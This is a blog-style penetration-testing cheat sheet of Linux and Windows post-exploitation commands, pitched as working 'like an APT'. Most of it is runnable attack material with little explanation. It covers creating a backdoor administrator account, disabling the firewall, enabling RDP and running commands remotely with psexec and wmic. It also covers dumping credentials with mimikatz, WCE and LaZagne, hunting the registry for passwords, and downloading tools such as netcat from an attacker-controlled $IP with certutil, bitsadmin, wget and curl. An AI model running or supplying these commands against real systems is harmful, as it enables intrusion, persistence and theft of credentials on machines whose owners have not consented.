🥷 The Art of Pentesting: Post-exploitation like an APT

Linux Post-exploitation most common and useful commands

text

Linux Post-exploitation

  • Check wrong permissions:

Find setuid binaries:

find / -perm -4000 -ls 2> /dev/null

Find files world writable:

find / -path /sys -prune -o -path /proc -prune -o -type f -perm -o=w -ls 2> /dev/null

Find directories world writable:

find / -path /sys -prune -o -path /proc -prune -o -type d -perm -o=w -ls 2> /dev/null

Look for interesting files:

find / -name "*.txt" -ls 2> /dev/null
find / -name "*.log" -ls 2> /dev/null

Check sudo:

sudo su
sudo -l

Decrypt PKCS#12 objects:

openssl pkcs12 -info -in $FILE

Show certs in PKCS#7 file:

openssl pkcs7 -print_certs -inform DER -in $FILE
openssl smime -verify -in signed.p7 -inform pem
openssl smime -verify -in signed.p7 -inform der

Show keystore content:

keytool -list -v -keystore keystore.jks
  • Commands for information gathering:

ps -ef
mount
/sbin/ifconfig -a
route -n
cat /etc/crontab
ls -la /var/spool/cron*/
ls -la /etc/cron.d
cat /etc/exports
cat /etc/redhat* /etc/debian* /etc/*release
netstat -tanu

Find users with shell access:

egrep -e '/bin/(ba)?sh' /etc/passwd

Check bootup services:

ls /etc/rc*

SSH relationships and logins:

cat ~/.ssh/*

References:

Tools:


Windows Post-exploitation

Check filesystem:

Like “ls -la” in Linux:

dir /A:H
dir /s /b C:\ | findstr /E ".txt" > txt.txt
dir /s /b C:\ | findstr /E ".log" > log.txt
dir /s /b C:\ | findstr /E ".doc" > doc.txt
dir /s /b C:\ | findstr /E ".xls" > xls.txt
dir /s /b C:\ | findstr /E ".xml" > xml.txt

Compute MD5 hash of a file:

Get-FileHash -Algorithm MD5 -Path .\$FILE

Check registry for sensitive strings:

reg query HKLM /f password /t REG_SZ /s > hklm_password.txt

reg query HKCU /f password /t REG_SZ /s > hkcu_password.txt

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated > reg_always.txt

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated >> reg_always.txt

Check scheduler for vulnerable tasks:

schtasks /query /fo LIST /v > schtasks.txt
tasklist /SVC > tasklist.txt

Other checks:

DRIVERQUERY
wmic os where Primary='TRUE' reboot

List hotfixes to find unpatched exploits:

wmic qfe
notepad myfile.txt:lion.txt

eventvwr.exe

quser > rdp.txt

netstat -an > netstat.txt

netsh firewall show config > firewall.txt

icacls service.exe

type C:\Windows\System32\drivers\etc\hosts

Wmic commands:

wmic service get name,displayname,pathname,startmode > wmic_service.txt

wmic /node:'' qfe GET description,FixComments,hotfixid,installedby,installedon,servicepackineffect

wmic /node:"" product get name,version,vendor

wmic process get Caption,CommandLine

wmic printer list status

wmic cpu get

List SIDs of the system (as admin):

wmic useraccount get name,sid,fullname

Net commands:

net view
net view \\host
net share
net use z: \\host\dir
net users
net user %username%
net config rdr

How to setup a backdoor account:

net user hax0r hax0r /add

net localgroup administrators hax0r /add

net localgroup "Remote Desktop users" hax0r /add

Check routing/network information:

route print
arp -A
ipconfig /all
getmac

Show files attributes / permissions

cacls cmd.exe
attrib cmd.exe

List services:

sc queryex type=service state=all

net start

Other info:

systeminfo
whoami

Idem for Win XP:

echo %USERNAME%
  • Firewall managing commands

netsh firewall show stat

netsh firewall show config

netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes

netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000

netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080

netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079

Disable firewall:

netsh advfirewall set currentprofile state off
netsh advfirewall set allprofiles state off
  • RDP

Show RDP sessions:

quser

qwinsta

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer" /v fDenyTSConnections /t REG_DWORD /d 0 /f

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0

netsh firewall set service type=remotedesktop mode=enable

net start termservice

net start "Terminal Services"

svchost.exe -k termsvcs

tasklist /svc /S servername/U username /P password

Change RDP daemon status from a Meterpreter session:

msf> reg queryval -k "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" -v TSEnabled
msf> reg setval -k "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" -v TSEnabled -d 1

More Meterpreter commands in the following post:

Learn Pentesting like a Pro
🥷 Metasploit Meterpreter Cheat Sheet
Useful commands with Meterpreter: Meterpreter upload file to Windows target: meterpreter> upload file c:\\windows Meterpreter download file from Windows target: meterpreter> download c:\\windows\\repair\\sam /tmp Meterpreter run .exe on target — handy for executing uploaded exploits…
Read more

Change RDP port in the Windows Registry:

\HKLM\System\CurrentControlSet\Control\Terminal Server\WinStationRDP-TCP Value : PortNUmber REG_DWORD=3389

Remote Execution commands:

wmis -U DOMAIN\$USER%$PASS //$DC cmd.exe /c $COMMAND

wmic /node:$IP /user:administrator /password:$PASSWORD bios get serialnumber

tasklist.exe /S $IP /U domain\username

tasklist.exe /S $IP /U domain\username /FI "USERNAME eq NT AUTHORITY\SYSTEM" /FI "STATUS eq running"

taskkill.exe /S $IP /U domain\username /F /FI "norton"

quser /SERVER:$IP

From sysinternals psexec:

psexec -accepteula \\$IP -u DOMAIN\USER cmd.exe

psexec \\$IP -s cmd /c copy \\server\share\file.ext c:\Temp

psexec -s \\$IP c:\windows\system32\cscript.exe script.vbs arg1

Copy a file to the target host AND execute it:

psexec -accepteula \\$IP -u DOMAIN\USER -c file.exe -w C:\temp

Authenticated WMI Exec via Powershell with metasploit:

msf > use exploit/windows/local/ps_wmi_exec
msf exploit(windows/local/ps_wmi_exec) > show options

Module options (exploit/windows/local/ps_wmi_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DOMAIN                     no        Domain or machine name
   PASSWORD                   no        Password to authenticate with
   RHOSTS                     no        Target address range or CIDR identifier
   SESSION                    yes       The session to run this module on.
   USERNAME                   no        Username to authenticate as


Exploit target:

   Id  Name
   --  ----
   0   Universal


msf exploit(windows/local/ps_wmi_exec) >

In the same host but with other role:

runas /user:administrator cmd

runas /noprofile /user:DOMAIN\administrator cmd

runas /profile /env /user:DOMAIN\$USER "%windir%\system32\script.bat"

Windows exploit suggester (OBSOLETE)

WARNING: As of March 14 2017 no longer supported (https://github.com/GDSSecurity/Windows-Exploit-Suggester/issues/28)

python windows-exploit-suggester.py --update

python windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt

Tools for information gathering

Manual method

dir %TMP% %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent

dir %USERPROFILE%\Favorites

type C:\Windows\System32\drivers\etc\hosts

LaZagne

Download LaZagne from https://github.com/AlessandroZ/LaZagne

laZagne.exe all
laZagne.exe browsers
laZagne.exe browsers -firefox

RATs (Remote Administration Tools)

  • Pupy https://github.com/n1nj4sec/pupy: opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python


Sniffers

Sniffers for Windows

Install Wireshark, also use in console dumpcap:

dumpcap -D
dumpcap -i $IFACE

Keyloggers for Windows

Windows keylogger (no admin rights):

To cross-compile it for Windows:

i686-w64-mingw32-g++ klog_main.cpp -o klog -static

Network sniffers for Linux

tcpdump -X -s 0 -i $INTERFACE

Password dumping

mimikatz

mimikatz.exe
mimikatz> privilege::debug
mimikatz> sekurlsa::logonPasswords
mimikatz> sekurlsa::msv

Fgdump

Dumps hashes (needs SYSTEM privileges)

fgdump.exe

WCE (Windows Credential Editor)

Dumps clear passwords:

wce -w

Dumps hashes:

wce

Persistent, writes in credentials.txt:

wce -r

Change your credentials in memory:

wce -s

Droppers

Droppers are programs that allows you to download tools, Trojans, etc to the target machine to follow the compromise locally.

Droppers using Linux

wget http://$IP/file
curl -k https://$IP/file > file
nc -nvv $IP 8080 > file
scp $FILE root@$IP:~

Droppers using Windows

Powershell

curl -Uri $URL

See also Powercat.

ROBOCOPY

NET USE \\$IP\IPC$ /USER:DOMAIN\USER

ROBOCOPY \\$IP\DATA\ C:\DATA\ /NP /TEE /E /dcopy:T /Z

NET USE \\$IP\IPC$ /D

BITSAdmin

https://docs.microsoft.com/en-us/windows/desktop/Bits/bitsadmin-tool

Direct Transfer:

bitsadmin /transfer myDownloadJob /download /priority normal http://$IP/$FILE c:\$FILE

Using a download queue:

bitsadmin /create myDownloadJob

bitsadmin /addfile myDownloadJob http://$IP/$FILE c:\$FILE

Certutil

certutil.exe -urlcache -split -f "https://$IP/files/netcat.exe" nc.exe

Notepad

notepad.exe http://$IP/file.txt

Living Off the Land (LOLbins) for Windows

Links:

Examples:

hh.exe C:\windows\system32\calc.exe

C# compiler built-in command:

csc.exe

Droppers Using known protocols

HTTP

Python2

python -m SimpleHTTPServer
python -m SimpleHTTPServer 80

Python3

python3 -m http.server 8080

PHP

php -S localhost:8000

Ruby

ruby -run -e httpd . -p 8000

FTP

pip install pyftpdlib
python -m pyftpdlib

SMB

impacket-smbserver PAYLOADS /root/payload

Thanks for reading Learn Pentesting like a Pro! Subscribe for free to receive new posts.


Posted

in

by

Tags:

Comments

Leave a Reply

Your email address will not be published. Required fields are marked *